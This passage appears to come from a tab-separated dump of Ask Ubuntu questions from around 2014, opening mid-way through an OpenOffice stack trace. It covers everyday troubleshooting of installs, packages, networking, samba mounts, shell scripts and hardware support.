_zn3psp16printfontmanager20countfontconfigfontserst8hash_mapin3rtl7ostringeins2_11ostringhashest8equal_tois3_esaist4pairis3_ieee+0x2d0 ) [ 0xb5cc0ba0 ] /opt/openoffice4/program/libvcl.so ( _zn3psp16printfontmanager10initializeev+0x268 ) [ 0xb5ccc960 ] /opt/openoffice4/program/libvcl.so ( _zn3psp16printfontmanager3getev+0x58 ) [ 0xb5ccd722 ] /opt/openoffice4/program/libvclplug_gen.so ( _zn14x11salgraphics14getdevfontlistep15impldevfontlist+0x2a ) [ 0xb2901c60 ] /opt/openoffice4/program/libvcl.so ( +0x222869 ) [ 0xb5e07869 ] /opt/openoffice4/program/libvcl.so ( +0x229551 ) [ 0xb5e0e551 ] /opt/openoffice4/program/libvcl.so ( _znk12outputdevice13gettextheightev+0x1c ) [ 0xb5e10900 ] /opt/openoffice4/program/libvcl.so ( +0x22d4fb ) [ 0xb5e124fb ] /opt/openoffice4/program/libvcl.so ( _zn12outputdevice8drawtexterk9rectanglerk6stringtpst6vectoris0_sais0_eeps3_pn3vcl11itextlayoute+0x17c ) [ 0xb5e13a3c ] /opt/openoffice4/program/../program/libspl.so ( +0xd3cf ) [ 0xaf6ca3cf ] /opt/openoffice4/program/../program/libspl.so ( +0xaf9a ) [ 0xaf6c7f9a ] /opt/openoffice4/program/../program/libspl.so ( +0xb1c8 ) [ 0xaf6c81c8 ] /opt/openoffice4/program/libsofficeapp.so ( +0x16325 ) [ 0xb7542325 ] /opt/openoffice4/program/libsofficeapp.so ( +0x2af20 ) [ 0xb7556f20 ] /opt/openoffice4/program/../program/deployment.uno.so ( +0x2ca6f ) [ 0xad2cea6f ] /opt/openoffice4/program/../program/deployment.uno.so ( +0x36142 ) [ 0xad2d8142 ] /opt/openoffice4/program/libdeploymentmisc.so ( _zn7dp_misc16syncrepositorieserkn3com3sun4star3uno9referenceins2_3ucb19xcommandenvironmenteee+0x1b8 ) [ 0xb6e8d394 ] /opt/openoffice4/program/libsofficeapp.so ( +0x2afd9 ) [ 0xb7556fd9 ] /opt/openoffice4/program/libsofficeapp.so ( +0x1947d ) [ 0xb754547d ] /opt/openoffice4/program/libvcl.so ( +0x13155b ) [ 0xb5d1655b ] /opt/openoffice4/program/libvcl.so ( _z6svmainv+0x2d ) [ 0xb5d16649 ] /opt/openoffice4/program/libsofficeapp.so ( soffice_main+0xaa ) [ 0xb756802c ] /opt/openoffice4/program/soffice.bin ( main+0x20 ) [ 0x8048c84 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0xb71104d3 ]
417691	sanity check on users created via apt-get install	running apt-get install on a given package may result in users being added to the system . is there an easy way to verify ( before installing the package ) , which users would be added and with what characteristics ? i mainly want to ensure that : users are created without a shell users are created without a password
417692	software center failed to open	i am beginner and installed ubuntu on dual boot with windows , then just started updating packages . i was about to finish but suddenly got error and update manager just stopped.after that my software center is not opeining.when i tried through terminal it give me this error : hacked @ hacked-inspiron-n5050 : ~ $ software-center 2014-02-07 17:31:22,142 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-02-07 17:31:22,148 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2014-02-07 17:31:22,457 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-02-07 17:31:22,583 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2014-02-07 17:31:22,591 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_translation-en , e : the package lists or status file could not be parsed or opened . 2014-02-07 17:31:23,765 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' then i just think of to reinstall it ( software center ) with terminal , but it give me sort of error like : hacked @ hacked-inspiron-n5050 : ~ $ sudo apt-get -- reinstall install software-center-f [ sudo ] password for hacked : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_translation-en e : the package lists or status file could not be parsed or opened . hacked @ hacked-inspiron-n5050 : ~ $
417696	mysql statement in bash shell script does not work / syntax error	hope someone can help me ! i do not know what 's wrong with this script ( bash / ubuntu 12.04 / mysql / xampp 1.8.3 ) . try to read an input file with a list of csv-filenames ( 449-r11 , 449-r12 .. ) in order to do some sql-statements ... . # ! /bin/bash outpath= '' /home/bono/rd/bv-out/tmp/distinct_ '' outpath1= '' /home/bono/rd/bv-out/tmp/load_ '' inpath= '' /home/bono/rd/bv-out/ '' while read line do rd= '' $ line '' bv_out_distinct= $ outpath $ rd bv_out_load_new_bvs= $ outpath1 $ rd rddatei= $ inpath $ rd # # # mysqls : /opt/lampp/bin/mysql -- local-infile -- user=root rd < < eof load data local infile $ rddatei into table bv_tmp_all fields terminated by ' ; ' ; select * from bv_tmp_all group by ban into outfile $ bv_out_distinct fields terminated by ' ; ' ; load data local infile $ bv_out_distinct into table bv_tmp_distinct fields terminated by ' ; ' ; update bv , bv_tmp_distinct set bv.rd=bv_tmp_distinct.rd , bv.lev21=bv_tmp_distinct.lev21 where bv.ban=bv_tmp_distinct.ban ; select * from bv_tmp_distinct where ban not in ( select ban from bv ) into outfile $ bv_out_load_new_bvs fields terminated by ' ; ' ; load data local infile $ bv_out_load_new_bvs into table bv fields terminated by ' ; ' ; truncate table bv_tmp_distinct ; truncate table bv_tmp_all ; eof # # # # # eosql done < /home/bono/rd/bv-out/allto468 i tried different versions : ( , nothing worked ... . i get this mysql-output : bono @ bono-s3210sh : ~/rd/procs $ ./load_rd_out_tmp error 1064 ( 42000 ) at line 2 : you have an error in your sql syntax ; check the manual that corresponds to your mys into table bv_tmp_all fiel ' at line 1 to use near ' '' load data local infile /home/bono/rd/bv-out/449-r11 error 1064 ( 42000 ) at line 2 : you have an error in your sql syntax ; check the manual that corresponds to your mys into table bv_tmp_all fiel ' at line 1 to use near ' '' load data local infile /home/bono/rd/bv-out/449-r12
417699	i cant install ubuntu 13.10 on acer 522 with win8.1	i have done a partition with win8.1 , i have left it exfat , is this 0k por the ubuntu 13.10 ? can i install in that partition the ubuntu ? or does it need to be in another format ? after i whent to the bios , and boot with the cd , i choosed instalation ... and after some time ( 30s ) , it all whent white , whant am i doing wrong , what do i need to do so it can install ? ?
417700	qt theme in clementine in 13.10	i have a strange problem with qt theme in clementine . when it is run from sound menu ( notification area ) , it has windows classic theme : when it is run from terminal or ubuntu menu , it looks ok : in both cases the 'clementine ' process is run without any arguments . how can i fix it ? thanks !
417706	remap keyboard using xmodmap but when press to change keyboard layout all settings are reset to default	i tried to map key following this guide how do i remap certain keys ? . it 's work for me . but one problem that i found is when i change keyboard layout ( alt+shift ) all keys will be reset to default . how to solve this problem ?
417707	thunderbird not sending emails from ubuntu host	i have the following problem : i am using ubuntu 12.04 in virtual box with windows 7 host . the email client is thunderbird 24.2.0 in the guest and thunderbird portable 24.3.0 in the host . up to a few weeks ago i was using the virtualbox with the bridged adapter and i had no trouble sending emails from thunderbird . the bridged adapter gives the guest a separate address in the lan than the host . then the wireless network at work was updated ( to be more secure ) and i could n't use the birdged adapter anymore . the virtualbox would n't get its own separate address . so , i had to switch to the nat adapter and this is when the problem started . i am in the following situation now : from the host : i can send and receive emails . from the guest when using nat : i can receive emails , but i ca n't send . from the guest when using bridged connection ( can not do that at work ) : i can send and receive emails . the email server i am using is through work and it requires to use port 587 . my thought was that thunderbird in the guest uses port 587 , but then the nat adapter uses a different port and the email server does not respond . the message i am getting is that `` the connection timed out '' . i looked the manual for the virtual box and it says that ports < 1024 can not be forwarded . so , i am in need of some help of what to do . any ideas ?
417709	loss of security ( update manager does n't ask for a password )	ubuntu is being updated , usually with ubuntu base on a weekly basis , and has been for some time . when the install button is pressed , the software goes thru the update process . problem : ubuntu does not request a password to authorize the update . is n't this a protocol violation ? does n't this risk entry to viruses , trojans , and the like ?
417710	how to disble or make convenient workspaces in 12.04 ?	i am using ubuntu 12.04 . how can i disable workspace in 12.04 ? if there is no way to do that , how can i quickly switch my focus between different workspaces , without clicking the clumsy `` workspace switcher '' ? for example , i saw mac users can glide their fingers on the touchpad to switch workspace to the right or left , while ubuntu 12.04 has four workspaces on the top left , top right , bottom left and bottom right , and i have n't found a way to move my focus between them by touchpad . thanks !
417712	ambient light sensor support	i have a 2010 sony vaio laptop running ubuntu 12.10 , with an ambient light sensor installed to adjust screen brightness automatically . however , last time i checked , this was not supported by default in the linux kernel , and apparently i had to patch the kernel to get it to work . my question is , were those patches already included in the latest linux kernel ?
417713	problem installing ubuntu 13.10 64-bit on intel 64 bit processor	i downloaded the ubuntu 13.10 64-bit iso image file from www.ubuntu.com , then i made both a bootable dvd and pen drive . when i put the dvd or pen drive into the computer and start up , i get ubuntu 's `` try live '' demo screen . then , i double click on the icon to install unbuntu 13.10 , but i do not get any response . i have tried to install ubuntu using both the dvd and the pen drive , but i get the same problem both times . i have an intel dual-core 2.8 ghz 64-bit processor , and 3 gb ram . my current operating system is a 32-bit installation of windows 7 professional .
417715	how does management differ from ubuntu on the clouds and on a dedicated server ?	from an administrators point of view ( tools , services , commands , way of working , thinking and accessing ) what differs from working with ubuntu on the clouds and working on a dedicated server or vps
417716	my laptop enable wireless got greyed out , not able to use wireless	i have been using the same 12.04 precise version kernel linux -3.5.4-generic laptop make -lenovo b460 as some how ( may be because of repeated requests to connect to a wireless connection ) i cancel that and after than enable wireless got disabled i have tried all options given in this forum while booting up -the wireless button is active , but later it got disabled i have also tried rfkill option also , when i try iwconfog wlan0 -it shows device does not exists all other the laptop function + other keys are working ( scroll lock , display off ) only wireless on/off key is not working loooks like os has stop recognizing wireless card this is my first query , as past queries were resolved by looking in to history only it will be a great help regards sudo lshw -c network output *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : c0 serial : f0 : de : f1:2d:1f:89 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full ip=192.168.2.2 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : f2400000-f243ffff ioport:2000 ( size=128 ) *-network disabled description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth1 version : 01 serial : ac:81:12:16:64 : ad width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : f2500000-f2503fff output of lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 03:00.0 ethernet controller : qualcomm atheros ar8131 gigabit ethernet ( rev c0 ) 04:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) output of rfkill unblock all ( bcmrwl is coming as i have tried other solutions ) 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no
417717	how to dual boot ubuntu 12.04 alongside windows 8.1 in toshiba laptop	i 've used wubi installer in windows 8.1 and tried installing ubuntu 12.04 . everything when on fine but i couldnt boot into ubuntu , it was unable to find wublidr.mdr file . thus , i am not able to reboot into ubuntu ... ..i would be grateful if anyone could help me !
417722	ubuntu 12.04 init process provokes memory leak and cpu intensive usage	i have lately been having some memory and cpu issues with init process . after rebooting , the memory used by it keeps increasing at quite high pace , and after half hour it occupies all the memory ram ( 4gb ) . something similar happens with the usage of cpu . as a workaround , i kill the process after every reboot ( funnily enough , sudo kill 1 works , whereas sudo kill -9 1 does n't ) . init process restarts and there is no memory leak or cpu greediness any more . but i 'd like to fix the problem properly . any suggestions will be more than welcome . thanks
417724	impossible to install 13.10	when i try to boot with 13.10 usb live the system stops when it tries to launche the graphic display . and i ca n't go further . it is a problem of double graphic cards , an intel and a radeon . the hardware is en hp notebook e050sf the vga is ( lspci results ) : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) the display controler radeon is : 01:00.0 display controller : advanced micro devices [ amd ] nee ati sun [ radeon hd 8600m series ] i have try the next ubuntu release , 14.04 , it is the same result . what can i do ? the 13.04 release installs and works perfectly ( so i stay with it for the moment ) thanks
417726	installing a comprehensive lapack implementation under ubuntu	i would like to ask how to properly install a comprehensive lapack package as e.g . is offered by the gentoo package 'sci-libs/clapack ' within a ubuntu environment . i am not talking about atlas here , which only offers a small part of lapack functionality , but a more general solution offering functions for e.g . eigen value problems like 'dstegr ' . here is what i achieved so far : my favorite search command apt-file search clapack.h offered only two possible sources . libatlas-dev : /usr/include/atlas/clapack.h libfreefem++-dev : /usr/include/freefem++/clapack.h as mentioned , the atlas version is not , what i want . the libfreefem variation on the other hand reads fine . so apt-get install libfreefem++-dev in addition apt-cache search lapack offers a lot , the most promising looking lines being liblapack-dev - library of linear algebra routines 3 - static version liblapack3gf - library of linear algebra routines 3 - shared version the first package of which i installed . now adding # include < freefem++/clapack.h > into my program returns an understandable long list of errors in the style 'integer ' , 'real ' , 'doublereal ' , ... was not declared in this scope as in fact they were not . anyways i am not looking for freefem or atlas but just a running , usable lapack implementation is there really no such thing for ubuntu ? rereading my own post i believe the question might also be boiled down to '' where can i obtain a comprehensive header file for 'liblapack-dev ' '' ?
417727	does ubuntu have a repair disk similar to windows repair disk ?	you 'll only understand my question if you have used windows and windows repair disk before . that disc repairs everything automatically , almost no command line , no debugging , nothing . you just create the disk , and if you ever messed up your system , it repairs everything automatically . on the linux side , we have boot repair disk , which is awesome but it repairs grub only . lets say i messed up my desktop environment , or something , is there there a tool to check what i needs to be fixed and fix it automatically . i 'm asking this question because i encounter so many issues and it would be nice if there 's an automated way to fix them .
417729	logmein under ubuntu to manage windows server	i have to manage some windows server by logmein . but i use ubuntu as client ... looks that logmein does not work under linux ... it 's the same for you ? simply i connect to logmein , i authenticate myself , try to connect.. java giveme some errors..
417730	rename /etc/passwd and /etc/shadow for security reasons	i have a server . my server is secure , but let 's imagine a good hacker that enter in . he can now look into /etc/passwd and /etc/shadow . i would like to rename that files /etc/passwd to something like /etc/xxanoda . i thought i can do a link , but for an hacker it will be easy to do ls -l. it is possible to rename those files and still have a running os , without compatibility issues , or it is completely useless ? just for the seek of knowledge .
417736	resized swap partition - swap space does not change ?	recently i resized my swap partition to make it bigger , but swap space staid the same . why is that so and how can i change it ? here is what i get when i run swapon : swapon : /dev/sda6 : pagesize=4096 , swapsize=999292928 , devsize=3798990848
417741	access and edit .bashrc via ssh on terminal	i try to access .bashrc by typing ~/.bashrc on my terminal . i am connecting to a remote server via ssh . i get an access denied message . i have no problems logging in , just the access denied message for that file . i need to edit it to load a compiler . how do i do that ? i have very recently started using xubuntu and ssh , so i would appreciate an easy to follow answer .
417745	usb and microcontroller communication problem	i am new to the linux world and am currently using ubuntu 12.04 . it is running in a windows partition . i have developed a python program that reads in serial data from a micro-controller over the usb port . all was working fine till two days ago when it began crashing . on inputting dmesg | grep tty in to the console i get the following output : [ 0.000000 ] console [ tty0 ] enabled [ 14.599394 ] cdc_acm 3-1:1.0 : ttyacm0 : usb acm device [ 290.236065 ] cdc_acm 3-1:1.0 : ttyacm0 : usb acm device [ 1105.915191 ] cdc_acm 3-1:1.0 : ttyacm0 : usb acm device every time i connect and disconnected the usb i get a new line with the same data . only difference been the time . is this right or have i a problem . any help would be appreciated . thanks update : the issue was with the micro-controller . it rebooted every time it did not receive a package from any sensors for a period of time . the micro-controller is a router on a wireless sensor network . every time the micro controller rebooted its connection port was incremented e.g ttyacm0 to ttyacm1 . upon connecting the controller to a raspberry pi this stopped happening .
417746	ca n't print duplexnotumble in firefox	i have two computers with ubuntu 12.04 and with same image config . both have firefox 26.0 , same printers , same updates , but one of them ca n't print in duplexnotumble , i select this option in printer properties but it ignore . i copy the /etc/cups and prefs.js file but not resolve . do you know where firefox save configurations ? or another solution .
417748	ctrl + alt + < key > does n't work on non-us ( f.x . german , danish ) keyboard layout	i have just recently moved from ms windows to linux , and it is great ; but there is one thing that really bugs me , and that is the use of ctrl+alt+key instead of using alt gr+key . when i program , it irritates me that often used buttons like curly-braces and square-brackets are not easily accessed through ctrl+alt+key . how do i change the behavior of ctrl+alt+key to do the same as alt gr+key ? as mentioned earlier , my keyboard has a danish layout .
417750	version of glib	i am trying to install a tool which requires lib 1.2 intalled . after a lot of hunting , i am still unable to find version of glib in my machine . googling , forums , say version of glibc . are glib and glic the same ? i typed the below command locate libglib following is the output i got : /lib/x86_64-linux-gnu/libglib-2.0.so.0 /lib/x86_64-linux-gnu/libglib-2.0.so.0.3800.0 /usr/lib/x86_64-linux-gnu/libglib-2.0.a /usr/lib/x86_64-linux-gnu/libglib-2.0.so /usr/lib/x86_64-linux-gnu/libglibmm-2.4.so.1 /usr/lib/x86_64-linux-gnu/libglibmm-2.4.so.1.3.0 /usr/lib/x86_64-linux-gnu/libglibmm_generate_extra_defs-2.4.so.1 /usr/lib/x86_64-linux-gnu/libglibmm_generate_extra_defs-2.4.so.1.3.0 /usr/share/doc/libglib-perl /usr/share/doc/libglib2.0-0 /usr/share/doc/libglib2.0-bin /usr/share/doc/libglib2.0-data /usr/share/doc/libglib2.0-dev /usr/share/doc/libglibmm-2.4-1c2a /usr/share/doc/libglib-perl/todo /usr/share/doc/libglib-perl/changelog.debian.gz /usr/share/doc/libglib-perl/copyright /usr/share/doc/libglib2.0-0/authors /usr/share/doc/libglib2.0-0/news.gz /usr/share/doc/libglib2.0-0/news.pre-1-3.gz /usr/share/doc/libglib2.0-0/readme.gz /usr/share/doc/libglib2.0-0/changelog.debian.gz /usr/share/doc/libglib2.0-0/copyright /usr/share/doc/libglib2.0-bin/authors /usr/share/doc/libglib2.0-bin/news.gz /usr/share/doc/libglib2.0-bin/readme.gz /usr/share/doc/libglib2.0-bin/changelog.debian.gz /usr/share/doc/libglib2.0-bin/copyright /usr/share/doc/libglib2.0-data/authors /usr/share/doc/libglib2.0-data/news.gz /usr/share/doc/libglib2.0-data/readme.gz /usr/share/doc/libglib2.0-data/changelog.debian.gz /usr/share/doc/libglib2.0-data/copyright /usr/share/doc/libglib2.0-dev/authors /usr/share/doc/libglib2.0-dev/news.gz /usr/share/doc/libglib2.0-dev/readme.debian /usr/share/doc/libglib2.0-dev/readme.gz /usr/share/doc/libglib2.0-dev/changelog.debian.gz /usr/share/doc/libglib2.0-dev/copyright /usr/share/doc/libglibmm-2.4-1c2a/authors /usr/share/doc/libglibmm-2.4-1c2a/news.gz /usr/share/doc/libglibmm-2.4-1c2a/readme /usr/share/doc/libglibmm-2.4-1c2a/changelog.debian.gz /usr/share/doc/libglibmm-2.4-1c2a/copyright /usr/share/gdb/auto-load/libglib-2.0.so.0.3800.0-gdb.py /usr/share/lintian/overrides/libglib2.0-0 /usr/share/python/runtime.d/libglib2.0-dev.rtupdate /var/cache/apt/archives/libglib2.0-dev_2.38.0-1ubuntu1_amd64.deb /var/lib/dpkg/info/libglib-perl.list /var/lib/dpkg/info/libglib-perl.md5sums /var/lib/dpkg/info/libglib2.0-0 : amd64.list /var/lib/dpkg/info/libglib2.0-0 : amd64.md5sums /var/lib/dpkg/info/libglib2.0-0 : amd64.postinst /var/lib/dpkg/info/libglib2.0-0 : amd64.postrm /var/lib/dpkg/info/libglib2.0-0 : amd64.shlibs /var/lib/dpkg/info/libglib2.0-0 : amd64.symbols /var/lib/dpkg/info/libglib2.0-0 : amd64.triggers /var/lib/dpkg/info/libglib2.0-bin.list /var/lib/dpkg/info/libglib2.0-bin.md5sums /var/lib/dpkg/info/libglib2.0-bin.postinst /var/lib/dpkg/info/libglib2.0-bin.postrm /var/lib/dpkg/info/libglib2.0-bin.preinst /var/lib/dpkg/info/libglib2.0-bin.prerm /var/lib/dpkg/info/libglib2.0-data.list /var/lib/dpkg/info/libglib2.0-data.md5sums /var/lib/dpkg/info/libglib2.0-data.preinst /var/lib/dpkg/info/libglib2.0-dev.list /var/lib/dpkg/info/libglib2.0-dev.md5sums /var/lib/dpkg/info/libglib2.0-dev.postinst /var/lib/dpkg/info/libglib2.0-dev.preinst /var/lib/dpkg/info/libglib2.0-dev.prerm /var/lib/dpkg/info/libglibmm-2.4-1c2a : amd64.list /var/lib/dpkg/info/libglibmm-2.4-1c2a : amd64.md5sums /var/lib/dpkg/info/libglibmm-2.4-1c2a : amd64.postinst /var/lib/dpkg/info/libglibmm-2.4-1c2a : amd64.postrm /var/lib/dpkg/info/libglibmm-2.4-1c2a : amd64.shlibs kindly suggest how to proceed on this part .
417752	ubuntu 13.10 wo n't install with nv gt630	i recently upgraded my pc with a nvidia geforce 630 because i would like to install a dual boot system . windows 7 is already installed an works finde with the gpu . but when i start the installation of ubuntu 13.10 via thumbdrive a strange error occurs . the standard orange background appears an when i move my mouse the pointer appears too . but nothing else happens . this is the point where usually the dialogue box appears and asks to try or install ubuntu . i 'm no expert , but i believe , that the gpu is to new or `` complicated '' to be recognized by the opensource driver . thanks in advance , markus
417754	ubuntu compatability with the asus vivobook x202e-dh31t-pk	is the asus vivobook x202e-dh31t-pk compatible with ubuntu ? it seems like a nice laptop , but i do n't want to be stuck with lots of hardware issues . i really do n't care about the webcam or the microphone ( i tend to disconnect them ) , but i 'd like working wi-fi and ethernet , and a non-screwed up backlight . dual booting does n't matter either - i 'm sending windows 8 straight back to hell when i 'm re-partitioning . if any one has one , or has used one i 'd be grateful for your thoughts . if any clarification is needed leave a comment below .
417755	cant connect my ipod nano on ubuntu 13.10	i have just update my netbook to ubuntu 13.10 and i unable to connect my ipod anymore . there is a crash everytime i try to connect it . the error report show , among another things the following message : ipod-set-info crashed with signal 7 package libgpod-common 0.8.2-7ubuntu3 i have n't found anything related to this problem so far and i dont know what to do . my ipod is a nano all model .
417756	zoom out on the screen / increase psudo-resolution	how to zoom out on the screen like the `` workspace switcher '' allows , but still be able to click and work normally . essentially i want to know how to make a virtual-screen-resolution ( i guess that is what it would be called ) that is much much bigger than the actual resolution . any ideas ?
417757	create a file before writing into it using python	i am new to python . i wanted to know if i could create a text file in the script itself before writing into . i do not want to create a text file using the command prompt . i have written this script to write the result into the file with open ( '1.txt ' , 'r ' ) as flp : data = flp.readlines ( ) however i know that 1.txt has to be created before writing into it . any help would be highly appreciated . thanks . avinash
417761	how to put availabe disk space into filename ?	i have a sftp user only and i want it to be able to see available space . i want to make a cron that runs each 30 minutes , to delete the old file and put the new file to show free disk space . i could just put df -h > df.txt , but i do n't want to do that . i want an empty file , with the filename like : 3.1g.available , and then in the shell script delete *.available and create the new file - which is run by cron . thanks in advance .
417762	a question concerning fstab ?	the scenario : server 1 is a samba file server client1 is ubuntu 12.04 desktop in server1 i have configured samba to share a parent directory called shared , shared contain three sub-folders user1 , user2 , user3 . smb.conf : [ share ] security = share valid users = user1 , user2 , user3 comment = nour path = /srv/samba/shared browsable = yes guest ok = no read only = no create mask = 0777 i give change the owner for each folder to each user , for example user1 is the owner of folder user1 . i give the folder permission chmod 700 the problem is when i connect to the share folder from ubuntu through connect to server and make the folder as bookmark , all is well and no problem , but when i use fstab to mount shared the permission for user1 on folder user1 is not even to read ( access is denied ) om fstab : //server/shared /mnt/share cifs rw , username=user1 , password=123 00 what is the problem ?
417766	ubuntu 12.04.4 lts kernel 3.11	just wondering why ubuntu used kernel 3.11 in the new 12.04.4 release.. ? is n't this kernel ( eol ) end of life .
417768	display problem with tex codes in browsers	after unsuccessfully installing latex packages thmtools under gnome environment on my work station , mainly because of lack of root access , i keep receiving the following error in displays of equations in any browsers failed to parse ( unknown function '\begin ' ) i am looking for an easy solution , without invoking the operations required root access .
417769	data recovery of external hdd	i have 1 tb of external seagate backup plus hdd . i accidentally erased it while i was trying to update ubuntu , during the install process . in ubuntu the hdd shows nothing , but if i open that drive in windows 8 , it shows files and folder with weird names . ( for eg . ≈ⁿ0╗ ∞5.ç=σ |w▒ε╢.nφ5 ╝'xf % äå.| ▀█┴ , iï└.╨▓ ) now , i want to recover this hdd using a recovery tool . i have not made any changes to the hdd and i am wondering what is the best recovery tool and how much would be possible to recover , if at all ? which ever option is better , please suggest the software best suited for my situation ! ! thanks already.. ds
417770	safe to install kubuntu 12.04 alongside ubuntu 12.04	this may be a stupid question to ask but i installed kubuntu next to ubuntu using the kubuntu install while in live usb mode ... ... ubuntu works and kubuntu does as well but i 'm worried about adverse future issues from doing it ... . is there anything i should watch out for ... i do have the linux grub thing too at boot up with like 8 options ... . just want advice and am worried that i may have messed things up ... .. hopefully i did not . let me know what you think
